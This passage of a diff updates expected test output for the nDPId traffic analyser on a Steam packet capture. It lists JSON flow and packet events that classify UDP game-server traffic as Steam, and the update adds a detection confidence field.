-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164886,"flow_last_seen":1357332164886,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164886,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1357332164887,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164887,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAROR3AqLyVy025BLJhaYkALFmQVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164887,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARBC7AqLyVRI50s7JhaYkALCShVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1357332164888,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164888,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNw7AqLyVSKU9vLJhaYkALFeBVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164888,"flow_last_seen":1357332164888,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164888,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1357332164892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164892,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSwAAIAROeySQpgMwKi8lWmLsmEANKu+VlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAMlh+aU0BAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1357332164912,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164912,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS0AAIARqvhEjnSzwKi8lWmJsmEANEAeVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAHUr6J8MAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1357332164925,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164925,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS4AAIAROeqSQpgMwKi8lWmKsmEANAVPVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAJg+KI\/QAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1357332164927,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164927,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWS8AAIAR3dZIpT28wKi8lWmJsmEANMuoVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAUb2BCq8AAAA="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQa3AqLyV0G+rUrJhaYkALGIgVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1357332164936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164936,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxHAqLyVSKU9ubJhaYoALFeDVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164936,"flow_last_seen":1357332164936,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164936,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L7AqLyVUatzBbJhaYsALBkwVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"steam.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.5","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1357332164937,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164937,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYkALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164937,"flow_last_seen":1357332164937,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164937,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1357332164974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164974,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTAAAIAR3dhIpT25wKi8lWmKsmEANKoaVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAABVTtA7EAAAA="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1357332164980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1357332164980,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWTEAAIARxIVEjlsiwKi8lWmJsmEANIkpVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAA3X7NeAABAAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1357332164986,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164986,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx7AqLyVkkKYDrJhaYkALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164986,"flow_last_seen":1357332164986,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164986,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARNxzAqLyVSKU9rrJhaYkALFePVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1357332164987,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1357332164987,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qfAqLyVRRyRq7JhaYkALAcbVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"steam.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164987,"flow_last_seen":1357332164987,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1357332164987,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"proto":"Steam","breed":"Fun","category":"Game"}}
